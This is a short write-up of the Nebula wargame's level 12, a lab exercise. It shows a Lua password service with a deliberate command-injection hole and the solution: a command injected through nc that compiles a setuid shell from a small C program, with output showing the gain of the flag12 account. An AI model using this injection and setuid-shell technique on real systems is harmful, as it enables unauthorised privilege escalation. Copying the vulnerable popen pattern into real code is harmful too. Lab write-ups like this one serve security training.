nebula level12

Level details:

There is a backdoor process listening on port 50001.

Source code:

	local socket = require("socket")
	local server = assert(socket.bind("127.0.0.1", 50001))
	function hash(password)
	prog = io.popen("echo "..password.." | sha1sum", "r")
	data = prog:read("*all")
	prog:close()
	data = string.sub(data, 1, 40)
	return data
	end
	while 1 do
	local client = server:accept()
	client:send("Password: ")
	client:settimeout(60)
	local line, err = client:receive()
	if not err then
	print("trying " .. line) -- log from where ;\
	local h = hash(line)
	if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
	client:send("Better luck next time\n");
	else
	client:send("Congrats, your token is 413**CARRIER LOST**\n")
	end
	end
	client:close()
	end

view raw level12.lua hosted with ❤ by GitHub

This one is super easy. It's a service written in lua that asks you for a password. The password's SHA-1 hash is generated and compared against a hardcoded hash. This is misleading, because the real problem resides in the hash function itself. The password variable is put in the command that generates the SHA-1 hash as is. Thus this is a simple command injection vulnerability.

level12@nebula:~$ cat > /tmp/shell.c
#include <unistd.h>
#include <stdlib.h>

int main()
{
    int euid = geteuid();

    setresuid(euid, euid, euid);
    system("sh");
    return 0;
}
level12@nebula:~$ echo '; cc -o /tmp/flag12_sh /tmp/shell.c; chmod +s /tmp/flag12_sh; echo' | nc localhost 50001
Password: Better luck next time
level12@nebula:~$ /tmp/flag12_sh
sh-4.2$ id
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)
sh-4.2$ getflag
You have successfully executed getflag on a target account

Still worth a flag though.

~ Dmitry